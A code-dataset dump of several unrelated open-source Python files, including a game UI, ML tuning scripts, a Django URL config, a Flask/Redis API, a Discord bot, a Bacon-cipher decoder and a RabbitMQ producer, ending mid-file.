0\n self.game_view.player_sprite.change_y = 0\n self.game_view.return_to_start()\n self.game_view.life = 3\n self.game_view.score = 0\n self.game_view.setup()\n self.window.show_view(self.game_view)\n arcade.set_viewport(left=0, right=SCREEN_WIDTH, bottom=0, top=SCREEN_HEIGHT)\n\n\nclass Congrats(arcade.View):\n def __init__(self, game_view):\n super().__init__()\n self.game_view = game_view\n self.fill_color = arcade.make_transparent_color(arcade.color.WHITE, transparency=90)\n\n def on_draw(self):\n \"\"\" Draw the congratulations\"\"\"\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(\n bottom_left_x=self.game_view.view_left,\n bottom_left_y=self.game_view.view_bottom,\n width=SCREEN_WIDTH,\n height=SCREEN_HEIGHT,\n texture=arcade.load_texture(\"images/congrats.png\"))\n arcade.draw_text(\"CONGRATULATION\", self.game_view.view_left + 100, self.game_view.view_bottom + 500,\n arcade.color.YELLOW_ROSE, font_size=50, align=\"center\")\n self.level_status_draw()\n PauseView(self.game_view).draw_menu_gameplay()\n self.game_view.update_score()\n\n def level_status_draw(self):\n if self.game_view.level == 2:\n arcade.draw_text(\"GAME FINISHED\", self.game_view.view_left + 100,\n self.game_view.view_bottom + 450,\n arcade.color.YELLOW_ROSE, font_size=30, align=\"right\")\n else:\n arcade.draw_text(\"TO NEXT LEVEL PRESS ENTER\", self.game_view.view_left + 100,\n self.game_view.view_bottom + 450,\n arcade.color.YELLOW_ROSE, font_size=30, align=\"right\")\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.set_viewport(left=0, right=SCREEN_WIDTH, bottom=0, top=SCREEN_HEIGHT)\n PauseView(self.game_view).eval_menu_gameplay(x, y)\n\n def on_key_press(self, key, _modifiers):\n if self.game_view.level != 2:\n if key == arcade.key.ENTER:\n arcade.set_viewport(left=0, right=SCREEN_WIDTH, bottom=0, top=SCREEN_HEIGHT)\n self.game_view.level += 1\n self.game_view.score = 0\n self.game_view.life = 3\n self.game_view.setup()\n self.window.show_view(self.game_view)\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":30015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"27317869","text":"import shutil\nimport os\nimport argparse\n\nfrom spotlight.cross_validation import user_based_train_test_split\nfrom spotlight.sequence.implicit import ImplicitSequenceModel\nfrom spotlight.sequence.representations import CNNNet\nfrom spotlight.evaluation import sequence_mrr_score\n\nfrom sklearn.model_selection import ParameterSampler\n\nimport mrecsys.sequence\nfrom mrecsys.utils.model_selection import EvalResults\nfrom mrecsys.utils.dataset import load_latest_interactions\n\nos.chdir(os.path.dirname(__file__))\n\nCUDA = (os.environ.get('CUDA') is not None or shutil.which('nvidia-smi') is not None)\n\nNUM_SAMPLES = 100\nLOSSES = ['bpr', 'pointwise', 'hinge', 'adaptive_hinge']\nN_ITER = list(range(15, 40, 5))\nMETRICS = ['mrr', 'p@k', 'r@k', 'rmse']\n\n\ndef sample_cnn_hyperparameters(random_state, num):\n space = {\n 'n_iter': N_ITER,\n 'loss': LOSSES,\n 'kernel_width': [3, 5, 7],\n 'num_layers': list(range(1, 10)),\n 'dilation_multiplier': [1, 2],\n 'nonlinearity': ['tanh', 'relu'],\n 'residual': [True, False]\n }\n\n sampler = ParameterSampler(space,\n n_iter=num,\n random_state=random_state)\n\n for params in sampler:\n params['dilation'] = list(params['dilation_multiplier'] ** (i % 8)\n for i in range(params['num_layers']))\n yield params\n\n\ndef sample_lstm_hyperparameters(random_state, num):\n space = {\n 'n_iter': N_ITER,\n 'loss': LOSSES,\n }\n sampler = ParameterSampler(space,\n n_iter=num,\n random_state=random_state)\n for params in sampler:\n yield params\n\n\ndef sample_immf_hyperparameters(random_state, num):\n space = {\n 'loss': LOSSES,\n 'n_iter': N_ITER,\n }\n sampler = ParameterSampler(space,\n n_iter=num,\n random_state=random_state)\n for params in sampler:\n yield params\n\n\ndef evaluate_cnn_model(hyperparameters, train, test, validation, random_state):\n h = hyperparameters\n\n net = CNNNet(train.num_items,\n kernel_width=h['kernel_width'],\n dilation=h['dilation'],\n num_layers=h['num_layers'],\n nonlinearity=h['nonlinearity'],\n residual_connections=h['residual'])\n\n model = ImplicitSequenceModel(loss=h['loss'],\n representation=net,\n n_iter=h['n_iter'],\n use_cuda=CUDA,\n random_state=random_state)\n\n model.fit(train, verbose=True)\n\n test_eval = {}\n test_eval['mrr'] = sequence_mrr_score(model, test).mean()\n\n val_eval = {}\n val_eval['mrr'] = sequence_mrr_score(model, validation).mean()\n\n return test_eval, val_eval\n\n\ndef evaluate_lstm_model(hyperparameters, train, test, validation, random_state):\n h = hyperparameters\n\n model = ImplicitSequenceModel(loss=h['loss'],\n representation='lstm',\n n_iter=h['n_iter'],\n use_cuda=CUDA,\n random_state=random_state)\n\n model.fit(train, verbose=True)\n\n test_eval = {}\n test_eval['mrr'] = sequence_mrr_score(model, test).mean()\n\n val_eval = {}\n val_eval['mrr'] = sequence_mrr_score(model, validation).mean()\n\n return test_eval, val_eval\n\n\ndef evaluate_pooling_model(hyperparameters, train, test, validation, random_state):\n h = hyperparameters\n\n model = ImplicitSequenceModel(loss=h['loss'],\n representation='pooling',\n n_iter=h['n_iter'],\n use_cuda=CUDA,\n random_state=random_state)\n\n model.fit(train, verbose=True)\n\n test_eval = {}\n test_eval['mrr'] = sequence_mrr_score(model, test).mean()\n\n val_eval = {}\n val_eval['mrr'] = sequence_mrr_score(model, validation).mean()\n\n return test_eval, val_eval\n\n\ndef tuning(train, test, validation, random_state, model_type, time_code):\n\n if model_type != 'immf':\n train = train.to_sequence()\n test = test.to_sequence()\n validation = validation.to_sequence()\n\n if model_type == 'cnn':\n eval_fnc, sample_fnc = (evaluate_cnn_model,\n sample_cnn_hyperparameters)\n elif model_type == 'lstm':\n eval_fnc, sample_fnc = (evaluate_lstm_model,\n sample_lstm_hyperparameters)\n elif model_type == 'pooling':\n eval_fnc, sample_fnc = (evaluate_pooling_model,\n sample_lstm_hyperparameters)\n else:\n raise ValueError('Unknown model type')\n\n results = EvalResults(os.path.join(mrecsys.sequence.__result_path__, 'tuning/{}_results.txt'.format(model_type, time_code)))\n best_results = {}\n for metric in METRICS:\n if results.best(metric) is not None:\n best_results[metric] = results.best(metric)\n print('Best {} result by {}: {}'.format(model_type, metric, best_results[metric]))\n\n for hyperparameters in sample_fnc(random_state, NUM_SAMPLES):\n if hyperparameters in results:\n continue\n\n try:\n print('Evaluating {}'.format(hyperparameters))\n\n (test_eval, val_eval) = eval_fnc(hyperparameters,\n train,\n test,\n validation,\n random_state)\n print('test_eval:', test_eval)\n print('val_eval:', val_eval)\n results.save(hyperparameters, test_eval, val_eval)\n except KeyboardInterrupt as e:\n raise e\n except:\n pass\n\n return results\n\n\ndef run(model_type=None):\n random_state = mrecsys.sequence.__random_state__\n\n if model_type is None:\n model_type = input('Enter model type (cnn / lstm / pooling): ')\n print('CUDA:', CUDA)\n interactions, time_code, _, _ = load_latest_interactions()\n train, rest = user_based_train_test_split(interactions, random_state=random_state)\n test, validation = user_based_train_test_split(rest, random_state=random_state)\n print('Split into \\n {} and \\n {} and \\n {}.'.format(train, test, validation))\n\n tuning(train, test, validation, random_state, model_type, time_code)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--model', help='define the network (cnn / lstm / pooling)')\n args = parser.parse_args()\n model_type = args.model\n run(model_type)\n","sub_path":"mrecsys/sequence/tuner.py","file_name":"tuner.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"116612521","text":"# LSTM Long Short Term Memory\n\n#1. Data\nimport numpy as np\n\nx = np.array([[1,2,3], [2,3,4], [3,4,5], [4,5,6]])\ny = np.array([4,5,6,7])\nx = x.reshape(4,3,1)\n\nprint(x.shape, y.shape)\n\n#2. Model\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, LSTM\n\nmodel = Sequential()\nmodel.add(LSTM(10, input_shape=(3, 1)))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n","sub_path":"keras/keras25_LSTM.py","file_name":"keras25_LSTM.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"58127509","text":"\"\"\"api URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import routers, permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nfrom provider.api.viewsets import ProviderViewSet, ProviderServiceAreaViewSet\nfrom provider.api.api_get_rides import RidesAPIView\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Mozio API\",\n default_version='v1',\n description=\"mozio ride matching API\",\n terms_of_service=\"\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nrouter = routers.DefaultRouter()\nrouter.register(r'providers', ProviderViewSet)\nrouter.register(r'provider-service-areas', ProviderServiceAreaViewSet)\n\nurlpatterns = [\n # path(r'swagger(?P\\.json|\\.yaml)', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path(r'swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path(r'redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n path('api/', include(router.urls)),\n path('api/rides/', RidesAPIView.as_view()),\n path('admin/', admin.site.urls),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"618053381","text":"\"\"\"キャッシュ関連。\"\"\"\nimport functools\nimport hashlib\nimport inspect\nimport pathlib\n\nimport joblib\n\nimport pytoolkit as tk\n\n\ndef memorize(cache_dir, compress=0, verbose=True):\n \"\"\"関数の戻り値をファイルにキャッシュするデコレーター。\n\n force_rerun=Trueを付けて呼び出すと強制的に再実行してキャッシュを上書き。\n\n \"\"\"\n\n def decorator(func):\n @functools.wraps(func)\n def memorized_func(*args, force_rerun=False, **kwargs):\n cache_path = get_cache_path(cache_dir, func, args, kwargs, verbose)\n # キャッシュがあれば読む\n if not force_rerun:\n if cache_path.is_file():\n if verbose:\n tk.log.get(__name__).info(f\"Cache is found: {cache_path}\")\n return joblib.load(cache_path)\n else:\n if verbose:\n tk.log.get(__name__).info(f\"Cache is not found: {cache_path}\")\n # 無ければ実処理\n result = func(*args, **kwargs)\n if tk.hvd.is_master():\n cache_path.parent.mkdir(parents=True, exist_ok=True)\n joblib.dump(result, cache_path, compress=compress)\n tk.hvd.barrier()\n if not tk.hvd.is_master():\n result = joblib.load(cache_path)\n tk.hvd.barrier()\n return result\n\n return memorized_func\n\n return decorator\n\n\ndef get_cache_path(cache_dir, func, args, kwargs, verbose):\n \"\"\"キャッシュのパスを作って返す。\"\"\"\n cache_dir = pathlib.Path(cache_dir)\n bound_args = inspect.signature(func).bind(*args, **kwargs).arguments\n args_list = sorted(dict(bound_args).items())\n args_str = \",\".join([f\"{repr(k)}:{repr(v)}\" for k, v in args_list])\n args_hash = hashlib.md5(args_str.encode(\"utf-8\")).hexdigest()[:8]\n if verbose:\n tk.log.get(__name__).info(f\"Cache {args_hash}: arguments={args_str}\")\n cache_path = cache_dir / f\"{func.__name__}_{args_hash}.pkl\"\n return cache_path\n","sub_path":"pytoolkit/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"45298442","text":"import json\nimport redis\nimport datetime\nimport os\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\nredis_ip = os.environ.get('REDIS_IP')\nif not redis_ip:\n raise Exception()\nrd=redis.StrictRedis(host=redis_ip, port=6379, db=0)\n\n@app.route('/animals', methods=['GET'])\ndef get_animals():\n animal_list = \"\"\n for i in range(rd.dbsize()):\n key=\"key\"+str(i+1)\n animal_list = animal_list+str(rd.hgetall(key))\n return animal_list+\"\\n\"\n\n@app.route('/animals/count', methods=['GET'])\ndef count_animals():\n return str(rd.dbsize())+\"\\n\"\n\n@app.route('/animals/dates', methods=['GET'])\ndef select_dates():\n date1 = request.args.get('d1')\n date2 = request.args.get('d2')\n date1 = datetime.datetime.strptime(date1, \"%Y-%m-%d\")\n date2 = datetime.datetime.strptime(date2, \"%Y-%m-%d\")\n within_range = \"\"\n for i in range(rd.dbsize()):\n key=\"key\"+str(i+1)\n date_created = str(rd.hmget(key, 'created_on'))\n date_created = date_created.replace('[', '')\n date_created = date_created.replace(\"'\", '')\n date_created = date_created.replace(']', '')\n date_created = datetime.datetime.strptime(date_created, \"%Y-%m-%d\")\n if date1 <= date_created and date_created <= date2:\n within_range = within_range+str(rd.hgetall(key))\n if i == 19:\n return \"All animals created within the queried date range: \"+within_range+\"\\n\"\n\n@app.route('/animals/dates/remove', methods=['GET'])\ndef remove_animals_by_date():\n date1 = request.args.get('d1')\n date2 = request.args.get('d2')\n date1 = datetime.datetime.strptime(date1, \"%Y-%m-%d\")\n date2 = datetime.datetime.strptime(date2, \"%Y-%m-%d\")\n within_range = \"\"\n for i in range(rd.dbsize()):\n key=\"key\"+str(i+1)\n date_created = str(rd.hmget(key, 'created_on'))\n date_created = date_created.replace('[', '')\n date_created = date_created.replace(\"'\", '')\n date_created = date_created.replace(']', '')\n date_created = datetime.datetime.strptime(date_created, \"%Y-%m-%d\")\n if date1 <= date_created and date_created <= date2:\n rd.delete(key)\n if i == 19:\n return within_range+\"\\n\"\n\n@app.route('/animals/average_legs', methods=['GET'])\ndef average_legs():\n total_legs = 0.0\n if rd.dbsize() == 0:\n return \"There are no animals!\\n\"\n for i in range(rd.dbsize()):\n key=\"key\"+str(i+1)\n legs = str(rd.hmget(key, 'legs'))\n legs = legs.replace('[', '')\n legs = legs.replace(\"'\", '')\n legs = legs.replace(']', '')\n total_legs = total_legs + float(legs)\n return str(total_legs/rd.dbsize())+\"\\n\"\n\n@app.route('/reset', methods=['GET'])\ndef populate_redis():\n animals = getdata()\n for i in range(len(animals['animals'])):\n key=\"key\"+str(i+1)\n rd.delete(key)\n rd.hmset(key,animals['animals'][(i)])\n key = \"\"\n rd.delete('animals')\n return key+\"\\n\"\n\n@app.route('/animals/select/', methods=['GET'])\ndef select(UUID):\n UUID = \"['\"+str(UUID)+\"']\"\n for i in range(rd.dbsize()):\n key = \"key\"+str(i+1)\n uid = str(rd.hmget(key, 'uid'))\n if uid == UUID:\n return str(rd.hgetall(key))+\"\\n\"\n \n@app.route('/animals/edit///', methods=['GET'])\ndef edit_animal(UUID, bodypart, new):\n UUID = \"['\"+str(UUID)+\"']\"\n for i in range(rd.dbsize()):\n key = \"key\"+str(i+1)\n uid = str(rd.hmget(key, 'uid'))\n if uid == UUID:\n bodypart = str(bodypart)\n rd.hset(key, bodypart, new)\n return \"Edited Animal: \"+str(rd.hgetall(key))+\"\\n\"\n\n@app.route('/print', methods=['GET'])\ndef print_redis_data():\n return str(rd.keys())+\"\\n\"\n \ndef getdata():\n with open(\"animals.json\", \"r\") as json_file:\n userdata = json.load(json_file)\n return userdata\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","sub_path":"homework06/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"565546276","text":"import discord #Use Discord.py API\r\nfrom discord.ext import commands #Import the commands\r\nfrom discord.ext.commands import Bot\r\nfrom discord import Game\r\nimport asyncio\r\nfrom itertools import cycle\r\nimport os\r\nimport json\r\n\r\n\r\nasync def get_prefix(bot, message):\r\n\r\n if not message.guild:\r\n return commands.when_mentioned_or(\"!!\")(bot, message)\r\n\r\n\r\n with open(\"prefixes.json\", \"r\") as f:\r\n prefixes = json.load(f)\r\n\r\n\r\n prefixes[str(message.guild.id)] = \"!!\"\r\n guildowner = message.guild.owner\r\n\r\n\r\n await bot.wait_until_ready()\r\n\r\n\r\n if str(message.guild.id) not in prefixes: \r\n\r\n guildowner.send(\"Thanks for inviting LAB! Before you can get started with the bot, please run !!prefix YOURPREFIX first.\")\r\n\r\n with open(\"prefixes.json\", \"w\") as f:\r\n json.dump(prefixes, f)\r\n\r\n return commands.when_mentioned_or(\"!!\")(bot, message)\r\n\r\n prefix = prefixes[str(message.guild.id)]\r\n return commands.when_mentioned_or(prefix)(bot, message)\r\n\r\n\r\nTOKEN = open(\"TOKEN.txt\", \"r\").read() #Gets Bot Token\r\nbot = commands.Bot(command_prefix = get_prefix) #Set prefix\r\nbot.remove_command(\"help\")\r\n\r\n\r\n@bot.event\r\nasync def on_guild_join(guild):\r\n owner = guild.owner\r\n\r\n joinembed=discord.Embed(title=\"Welcome!\", color=0x0000ff)\r\n joinembed.add_field(name=\"Getting Started\", value=\"To get the bot running use this command: \", inline=False)\r\n joinembed.add_field(name=\"Command\", value=\"!!prefix !! or !!prefix YOURPREFIX\", inline=False)\r\n\r\n await owner.send(embed=joinembed)\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(\"Bot is initalized. Version 0.0.4 lock and loaded.\")\r\n servers = len(bot.guilds)\r\n print(\"Active on \" + str(servers) + \" server\")\r\n\r\n\r\ndef __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n\r\n self.setbotgame = self.loop.create_task(self.change_status)\r\n\r\n@bot.event\r\nasync def on_message(message):\r\n author = message.author\r\n content = message.content\r\n print(\"{}: {}\".format(author, content))\r\n await bot.process_commands(message) #Continues searching for commands after executing this event.\r\n\r\n@bot.event\r\nasync def on_join(ctx):\r\n owner = ctx.guild.owner.id\r\n\r\n infoembed=discord.Embed(title=\"Starting Information\", color=0x00FF00)\r\n infoembed.add_field(name=\"Getting Started\", value=\"To get the bot running use this command: \", inline=False)\r\n infoembed.add_field(name=\"Command\", value=\"!!prefix YOURPREFIX\", inline=False)\r\n\r\n await owner.send(embed=infoembed)\r\n\r\n@bot.command()\r\nasync def ping(ctx):\r\n await ctx.send(\"Pong! {0}\".format(round(bot.latency, 1)))\r\n\r\n@bot.command()\r\nasync def spaceforme(ctx, *, args): # * means multiple words given\r\n output = ''\r\n for word in args:\r\n output += word\r\n output += ' '\r\n await ctx.send(output)\r\n\r\n\r\n@bot.command()\r\nasync def say(ctx, *, args): # * means multiple words given\r\n output = ''\r\n for word in args:\r\n output += word\r\n await ctx.send(output)\r\n\r\n@bot.event\r\nasync def on_message_delete(message):\r\n author = message.author\r\n content = message.content\r\n print(\"{}: {}\".format(author, content) + \" got deleted\") #Send a message to the server defined in variable\r\n await bot.process_commands(message)\r\n\r\n\r\nfor cog in os.listdir(\".\\\\cogs\"):\r\n if cog.endswith(\".py\") and not cog.startswith(\"_\"):\r\n try:\r\n cog = f\"cogs.{cog.replace('.py', '')}\"\r\n bot.load_extension(cog)\r\n except Exception as e:\r\n print(f\"{cog} can not be loaded:\")\r\n raise e\r\n\r\nasync def chng_pr():\r\n await bot.wait_until_ready()\r\n servers = len(bot.guilds)\r\n\r\n while not bot.is_closed():\r\n\r\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=str(servers) + \" server\"))\r\n\r\n await asyncio.sleep(30)\r\n\r\n await bot.change_presence(activity=discord.Game(name=\"V0.0.4\"))\r\n\r\n await asyncio.sleep(30)\r\n\r\n\r\nasync def on_command_error(self, ctx, error):\r\n if isinstance(error, commands.CheckFailure):\r\n await ctx.send(\"You don't have the permission to do that!\")\r\n if isinstance(error, commands.CommandNotFound):\r\n await ctx.send(\"This command is not existing\")\r\n\r\n\r\n raise error\r\n\r\n\r\n\r\n\r\nbot.loop.create_task(chng_pr())\r\nbot.run(TOKEN)\r\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"187719723","text":"import zipfile\nwith zipfile.ZipFile('main.zip','r') as zip_ref:\n zip_ref.extractall('given files')\n\nimport os\nw=list()\nfor root, dirs, files in os.walk(\"given files\"):\n for file in files:\n if file.endswith(\".py\"):\n p=os.path.join(root)\n p=p[::-1]\n for i in range(len(p)):\n if p[i]=='/':\n p=p[:i]\n p=p[::-1]\n break\n w.append(p)\nw.sort()\nfor i in range(1,len(w)):\n if w[i]!=w[i-1]:\n print(w[i-1])\nprint(w[i])\n#a=list()\n#for name in w:\n# a.append(name[-2])\n#print(a)\n","sub_path":"w3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"113706405","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.15-x86_64/egg/flask_limiter/errors.py\n# Compiled at: 2019-10-02 22:11:48\n# Size of source mod 2**32: 1214 bytes\n\"\"\"\nerrors and exceptions\n\"\"\"\nfrom distutils.version import LooseVersion\nfrom pkg_resources import get_distribution\nfrom six import text_type\nfrom werkzeug import exceptions\nwerkzeug_exception = None\nwerkzeug_version = get_distribution('werkzeug').version\nif LooseVersion(werkzeug_version) < LooseVersion('0.9'):\n import werkzeug._internal\n werkzeug._internal.HTTP_STATUS_CODES[429] = 'Too Many Requests'\n werkzeug_exception = exceptions.HTTPException\nelse:\n werkzeug_exception = exceptions.TooManyRequests\n\nclass RateLimitExceeded(werkzeug_exception):\n __doc__ = '\\n exception raised when a rate limit is hit.\\n The exception results in ``abort(429)`` being called.\\n '\n code = 429\n limit = None\n\n def __init__(self, limit):\n self.limit = limit\n if limit.error_message:\n description = limit.error_message if not callable(limit.error_message) else limit.error_message()\n else:\n description = text_type(limit.limit)\n super(RateLimitExceeded, self).__init__(description=description)","sub_path":"pycfiles/Flask_Limiter-1.2.1-py3.8/errors.cpython-38.py","file_name":"errors.cpython-38.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"83108241","text":"\n\n#calss header\nclass _DONOR():\n\tdef __init__(self,): \n\t\tself.name = \"DONOR\"\n\t\tself.definitions = [u'a person who gives some of their blood or a part of their body to help someone who is ill: ', u'a person who gives money or goods to an organization: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_donor.py","file_name":"_donor.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"428252529","text":"'''\n解培根密码\n'''\ndef bacon_decode(s):\n bs = \"\"\n bacon_table1 = 'abcdefghijklmnopqrstuvwxyz??????'\n bacon_table2 = 'abcdefghiklmnopqrstuwxyz????????'\n\n for x in s:\n if 'A' <= x <= 'Z':\n bs += '1'\n elif 'a' <= x <= 'z':\n bs += '0'\n\n bacon_m = [\"\", \"\", \"\", \"\"]\n bs += '0' * (5 - len(bs) % 5)\n for i in range(0, len(bs), 5):\n p = int(bs[i: i + 5], 2)\n bacon_m[0] += bacon_table1[p]\n bacon_m[1] += bacon_table2[p]\n bacon_m[2] += bacon_table1[31 - p]\n bacon_m[3] += bacon_table2[31 - p]\n return bacon_m\n\ns = r\"...\"\nprint(\"\\n\\n\".join(bacon_decode(s)).replace('x', ' '))\nprint(\"\\n\\n\")\n","sub_path":"Python/CTF/bacon.py","file_name":"bacon.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"172996680","text":"\"\"\"\nGetis-Ord's G geostatistics (hotspot/coldspot analysis)\n\"\"\"\n\nimport pysal as ps\nfrom collections import OrderedDict\n\n# crankshaft modules\nimport crankshaft.pysal_utils as pu\nfrom crankshaft.analysis_data_provider import AnalysisDataProvider\n\n# High level interface ---------------------------------------\n\n\nclass Getis:\n def __init__(self, data_provider=None):\n if data_provider is None:\n self.data_provider = AnalysisDataProvider()\n else:\n self.data_provider = data_provider\n\n def getis_ord(self, subquery, attr,\n w_type, num_ngbrs, permutations, geom_col, id_col):\n \"\"\"\n Getis-Ord's G*\n Implementation building neighbors with a PostGIS database and PySAL's\n Getis-Ord's G* hotspot/coldspot module.\n Andy Eschbacher\n \"\"\"\n\n # geometries with attributes that are null are ignored\n # resulting in a collection of not as near neighbors if kNN is chosen\n\n qvals = OrderedDict([(\"id_col\", id_col),\n (\"attr1\", attr),\n (\"geom_col\", geom_col),\n (\"subquery\", subquery),\n (\"num_ngbrs\", num_ngbrs)])\n\n result = self.data_provider.get_getis(w_type, qvals)\n attr_vals = pu.get_attributes(result)\n\n # build PySAL weight object\n weight = pu.get_weight(result, w_type, num_ngbrs)\n\n # calculate Getis-Ord's G* z- and p-values\n getis = ps.esda.getisord.G_Local(attr_vals, weight,\n star=True, permutations=permutations)\n\n return zip(getis.z_sim, getis.p_sim, getis.p_z_sim, weight.id_order)\n","sub_path":"release/python/0.6.1/crankshaft/crankshaft/clustering/getis.py","file_name":"getis.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"419146306","text":"'''\n@Author: sauron\n@Date: 2019-10-29 15:33:55\n@LastEditTime : 2020-01-07 11:59:29\n@LastEditors : Sauron Wu\n@Description: In User Settings Edit\n@FilePath: /pynq_car/Host-Part/dnndk-host/graph_input_fn.py\n'''\nimport cv2\n#from PIL import Image\nimport os\nimport numpy as np\nimport glob\nCONV_INPUT = \"conv2d_1_input\"\ncalib_batch_size = 50\ndef calib_input(iter):\n training_data = glob.glob(\"../training_data_npz/*.npz\")\n images = []\n with np.load(training_data[iter%len(training_data)]) as data:\n img_num_in_npz = len(data['train_imgs'])\n for index in range(0, calib_batch_size):\n images.append(data['train_imgs'][index%img_num_in_npz])\n return {CONV_INPUT: images}\n\n","sub_path":"Host-Part/dnndk-host/graph_input_fn.py","file_name":"graph_input_fn.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"521876394","text":"class Solution:\n \"\"\"\n @param arr: the positions\n @return: minimum number of moves\n \"\"\"\n def movingStones(self, arr):\n # Write your code here\n arr.sort()\n res1 = res2 = 0\n for i in range(len(arr)):\n res1 += abs(arr[i] - i * 2 - 1)\n res2 += abs(arr[i] - i * 2 - 2)\n return min(res1, res2)\n","sub_path":"Contest 53 Weekly #33/1585. 移动石子/li.py","file_name":"li.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"602811119","text":"from kombu import Connection, Exchange, Queue, Producer, Consumer\n\nglobal cam_light\ncam_light = 'Red'\n\ndef process_camera(body, message):\n global cam_light\n print('cam message received')\n if body == 'OK':\n cam_light = 'Green'\n print('{}-{}'.format(cam_light,body))\n else:\n cam_light = 'Yellow'\n print('{}-{}'.format(cam_light,body))\n message.ack()\n\nrabbit_url = 'amqp://localhost:5672/'\ncam_exchange_name = 'camera_exchange'\ncam_queue_name = 'camera_queue'\nqueue_key = 'CAMERA'\n\nthisConnection = Connection(rabbit_url)\nthisChannel = thisConnection.channel()\ncamExchange = Exchange(cam_exchange_name, type='direct')\n\ncamQueue = Queue(name=cam_queue_name, exchange=camExchange, routing_key=queue_key, max_length=5)\ncamQueue.maybe_bind(thisConnection)\ncamQueue.declare()\n\ncamProducer = Producer(channel=thisChannel, exchange=camExchange, routing_key=queue_key)\ncamProducer.publish('OK')\n\ncamConsumer = Consumer(thisConnection, queues=camQueue, callbacks=[process_camera], accept=['text/plain'])\ncamConsumer.consume()\nprint('{}'.format(cam_light))\n","sub_path":"camproducer.py","file_name":"camproducer.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"340217805","text":"import numpy as np\nimport os\n\n################## query based on ICRS coordinates 2 arcsec search radius\n\nos.system('cp rebull_raw_ICRS.reg rebull_ICRS_Gaia.reg') # template region file to show Gaia results\n\nrebull_raw_ICRS_Gaia = np.loadtxt('rebull_raw_ICRS_Gaia.txt',dtype='string')\nrows, cols = rebull_raw_ICRS_Gaia.shape\ndistdic = {}\nfor rr in range(rows):\n kk = str(rebull_raw_ICRS_Gaia[rr,0])\n dd = int(float(rebull_raw_ICRS_Gaia[rr,5]))\n distdic[kk] = str(dd)\n\nrebull_ICRS_Gaia = open('rebull_ICRS_Gaia.reg', 'r')\nnewregfile = open('ds9.reg','w') \nreglines = rebull_ICRS_Gaia.readlines()\nreghead = reglines[:3]\nregdata = reglines[3:]\nfor ll in reghead:\n newregfile.write(ll)\nfor lll in regdata:\n if lll[6:28] in 